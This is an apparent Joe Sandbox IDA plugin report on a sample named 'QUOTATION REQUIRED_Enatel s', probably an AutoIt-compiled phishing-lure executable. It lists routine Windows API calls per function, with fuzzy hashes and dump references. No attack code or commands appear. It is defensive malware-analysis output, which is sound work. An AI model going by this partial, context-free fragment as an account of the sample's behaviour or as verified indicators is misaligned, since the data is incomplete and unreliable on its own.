                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 2147712094-78025650
                                                                                                                    • Opcode ID: 2f900752e34deb3543bfdb98fd3805bb664c6376a5bae97283b44c008eed014a
                                                                                                                    • Instruction ID: 02a13d8f1a3baee4a0893cec24ca974856269fc50779bb5df771afa8af384361
                                                                                                                    • Opcode Fuzzy Hash: 2f900752e34deb3543bfdb98fd3805bb664c6376a5bae97283b44c008eed014a
                                                                                                                    • Instruction Fuzzy Hash: AA4195B1E00219ABDB219F64CC45FEA77A9FF09360F100526F958E7281D775DE84EB90
                                                                                                                    Function 00F7BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7BCFD
                                                                                                                    • IsMenu.USER32(00000000), ref: 00F7BD1D
                                                                                                                    • CreatePopupMenu.USER32 ref: 00F7BD53
                                                                                                                    • GetMenuItemCount.USER32(01235688), ref: 00F7BDA4
                                                                                                                    • InsertMenuItemW.USER32(01235688,?,00000001,00000030), ref: 00F7BDCC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                    • String ID: 0$2
                                                                                                                    • API String ID: 93392585-3793063076
                                                                                                                    • Opcode ID: c89daaac1725604b53bf131a7d4935f96b2fa3498b5dca40d35f57913b610f29
                                                                                                                    • Instruction ID: 90fab85b849e4e9077aef07c9d6d601b3e0ba3679aa622237fd1993ae6bf12ba
                                                                                                                    • Opcode Fuzzy Hash: c89daaac1725604b53bf131a7d4935f96b2fa3498b5dca40d35f57913b610f29
                                                                                                                    • Instruction Fuzzy Hash: 12519F70A002099FDB21CFA8D888BAEBBF5AF46324F14C15AF419D7291E7749941EB52
                                                                                                                    Function 00F7C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F7C913
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 6a6f3a82e734490b258386ba058ab87bb73bd80ef07628634d895862cbab60b6
                                                                                                                    • Instruction ID: 7d8baf4383ca37f71e5a8d7ede96b0d3ced76778abcd7f2b4646177916cb291b
                                                                                                                    • Opcode Fuzzy Hash: 6a6f3a82e734490b258386ba058ab87bb73bd80ef07628634d895862cbab60b6
                                                                                                                    • Instruction Fuzzy Hash: 4F11BE32A8930ABAA7055B549C82DDA7BACDF15774B50402FF608E5281DB74BD0072E7
                                                                                                                    Function 00F7ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 952045576-0
                                                                                                                    • Opcode ID: c34c03e1e2d8666025b16b8cadad4da0288f8c25cf24105780407bdebf2a9b24
                                                                                                                    • Instruction ID: af2a8509fca15b218801a25e245c21f121f70550acd26512e60d40146c012fab
                                                                                                                    • Opcode Fuzzy Hash: c34c03e1e2d8666025b16b8cadad4da0288f8c25cf24105780407bdebf2a9b24
                                                                                                                    • Instruction Fuzzy Hash: 70419365C1121875CB11EBF48C8AACFB7A8AF49720F518867F518E3121FB38E255D3A6
                                                                                                                    Function 00F2F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00F2F953
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00F6F3D1
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00F6682C,00000004,00000000,00000000), ref: 00F6F454
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: 50239311a1590374d339fed700fd605175725e64b293b0d3e50004e0072e7a53
                                                                                                                    • Instruction ID: a709f1706c11b60ee6228872204ab408116fd722b6ce1c80ff2f402ff3b58199
                                                                                                                    • Opcode Fuzzy Hash: 50239311a1590374d339fed700fd605175725e64b293b0d3e50004e0072e7a53
                                                                                                                    • Instruction Fuzzy Hash: B0412D31A28690BBD7398B2DFC8872A7BB1AB56320F14443DE08756661DA3198C8FB51
                                                                                                                    Function 00FA2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00FA2D1B
                                                                                                                    • GetDC.USER32(00000000), ref: 00FA2D23
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FA2D2E
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00FA2D3A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00FA2D76
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00FA2D87
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00FA5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00FA2DC2
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00FA2DE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 3e323a01c9275538d0afd69fa2849d30851554c38a0152b65756b31d4ddfb0df
                                                                                                                    • Instruction ID: a272b739c1985575b21182db25eabca51e600e062d4498398a2c2298618ab8d7
                                                                                                                    • Opcode Fuzzy Hash: 3e323a01c9275538d0afd69fa2849d30851554c38a0152b65756b31d4ddfb0df
                                                                                                                    • Instruction Fuzzy Hash: 02317CB2201214BFEB118F54CC8AFEB3BA9EF0A725F044055FE08DA291C6759C51DBA4
                                                                                                                    Function 00F75622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: fe9cdfc4743d5fc7fa7f998dcb9949350a6ba73bc782ff870c71f89b457c7b95
                                                                                                                    • Instruction ID: 12e64ba9b3e39759ad2769ba310c5f98e546475fff062284f842f623e3792701
                                                                                                                    • Opcode Fuzzy Hash: fe9cdfc4743d5fc7fa7f998dcb9949350a6ba73bc782ff870c71f89b457c7b95
                                                                                                                    • Instruction Fuzzy Hash: 5E210AA2A40A09B7D21855118D82FBA335CBF11BB4F448022FD0C9E541F7A4EF14B1A7
                                                                                                                    Function 00F94FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: c66e308e07640143a7152a1980754d537e7aa1d22cb35526f8272d4cb77d5f2e
                                                                                                                    • Instruction ID: eb38089637452d897781cafe7d19218d18c7c43896bb20331ff47ef55f4ac15d
                                                                                                                    • Opcode Fuzzy Hash: c66e308e07640143a7152a1980754d537e7aa1d22cb35526f8272d4cb77d5f2e
                                                                                                                    • Instruction Fuzzy Hash: 58D1C171E0060A9FEF11CFA8C881FAEB7B5BF48754F148069E915AB280E771DD85DB90
                                                                                                                    Function 00F51522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F515CE
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51651
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F517FB,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F516E4
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F516FB
                                                                                                                      • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51777
                                                                                                                    • __freea.LIBCMT ref: 00F517A2
                                                                                                                    • __freea.LIBCMT ref: 00F517AE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2829977744-0
                                                                                                                    • Opcode ID: cbc2ad6c5865128e18deba2fa4a3043bd84a3813d57b3bde1612499dbd7599d6
                                                                                                                    • Instruction ID: b750fe4ecb9dc3ac57be579e6a73aef0bbe28ce101620b55f9f7015559b9fe32
                                                                                                                    • Opcode Fuzzy Hash: cbc2ad6c5865128e18deba2fa4a3043bd84a3813d57b3bde1612499dbd7599d6
                                                                                                                    • Instruction Fuzzy Hash: 6F91C872E002165ADF208E74DC81BEE7BB5BF49321F184659EE01E7141E735EC48E7A0
                                                                                                                    Function 00F94523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                    • Opcode ID: e804302d19f261b518d02fb87093b85c144ecb98c30a4ae9bbba2d26dd97b645
                                                                                                                    • Instruction ID: 94bb87955a0463bfc19786c3533d2a38733ae4ee93ffe0b21530e9217cc1ed46
                                                                                                                    • Opcode Fuzzy Hash: e804302d19f261b518d02fb87093b85c144ecb98c30a4ae9bbba2d26dd97b645
                                                                                                                    • Instruction Fuzzy Hash: A291B771E00219ABEF20CFA4CC44FAEBBB8EF56714F108559F505AB280D770A946DFA1
                                                                                                                    Function 00F81187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00F8125C
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81284
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00F812A8
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F812D8
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F8135F
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F813C4
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00F81430
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2550207440-0
                                                                                                                    • Opcode ID: 485eafd476fea40522bee4a706f2d45dc2404908f051b38940def609625d6f52
                                                                                                                    • Instruction ID: 6b38385ff9411a9636103e4a63d7dc3bf40207086bd97d09e8a8345c36526e68
                                                                                                                    • Opcode Fuzzy Hash: 485eafd476fea40522bee4a706f2d45dc2404908f051b38940def609625d6f52
                                                                                                                    • Instruction Fuzzy Hash: 7391C272E002199FDB00EF94C885BFE77B9FF45325F104229E941E7291D778A946EB90
                                                                                                                    Function 00F2948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 549f8a9e9d861e3b2907f01010d564efe30234088d19b88c2a1d2d5402707779
                                                                                                                    • Instruction ID: 7d4b89ee59907418fb174a032eb3819e842b92990d563aa5aa780fd55af1c653
                                                                                                                    • Opcode Fuzzy Hash: 549f8a9e9d861e3b2907f01010d564efe30234088d19b88c2a1d2d5402707779
                                                                                                                    • Instruction Fuzzy Hash: BC914871E04219EFCB10CFA9DC85AEEBBB8FF49320F148059E515B7251D378A941EBA0
                                                                                                                    Function 00F93947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00F9396B
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00F93A7A
                                                                                                                    • _wcslen.LIBCMT ref: 00F93A8A
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00F93C1F
                                                                                                                      • Part of subcall function 00F80CDF: VariantInit.OLEAUT32(00000000), ref: 00F80D1F
                                                                                                                      • Part of subcall function 00F80CDF: VariantCopy.OLEAUT32(?,?), ref: 00F80D28
                                                                                                                      • Part of subcall function 00F80CDF: VariantClear.OLEAUT32(?), ref: 00F80D34
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                    • Opcode ID: 999ff6d1c2a13fbb65f396f97929b41fd6c0eb77a9cc133ebf259a54d12c7621
                                                                                                                    • Instruction ID: ccd4b0fbb3be60eaf5fd622efe662425e5041474c5230bf42fea6241d6c197aa
                                                                                                                    • Opcode Fuzzy Hash: 999ff6d1c2a13fbb65f396f97929b41fd6c0eb77a9cc133ebf259a54d12c7621
                                                                                                                    • Instruction Fuzzy Hash: BB917B75A083059FCB10EF64C88096AB7E5FF89314F14892DF8899B351DB34EE45EB92
                                                                                                                    Function 00F94BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F7000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?,?,00F7035E), ref: 00F7002B
                                                                                                                      • Part of subcall function 00F7000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70046
                                                                                                                      • Part of subcall function 00F7000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70054
                                                                                                                      • Part of subcall function 00F7000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?), ref: 00F70064
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F94C51
                                                                                                                    • _wcslen.LIBCMT ref: 00F94D59
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F94DCF
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00F94DDA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                    • Opcode ID: ef3d8222cdcc792c828dc3151972103bea02674798da7780be643f59ed8420a0
                                                                                                                    • Instruction ID: 3c27347625ea8f887a0e43f5ddad71b57a4f6df0c18c7719aaffc343edef88e6
                                                                                                                    • Opcode Fuzzy Hash: ef3d8222cdcc792c828dc3151972103bea02674798da7780be643f59ed8420a0
                                                                                                                    • Instruction Fuzzy Hash: D7911771D0021DAFEF10DFA4CC90EEDB7B8BF08310F10816AE915A7251DB34AA459FA0
                                                                                                                    Function 00FA20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenu.USER32(?), ref: 00FA2183
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00FA21B5
                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FA21DD
                                                                                                                    • _wcslen.LIBCMT ref: 00FA2213
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00FA224D
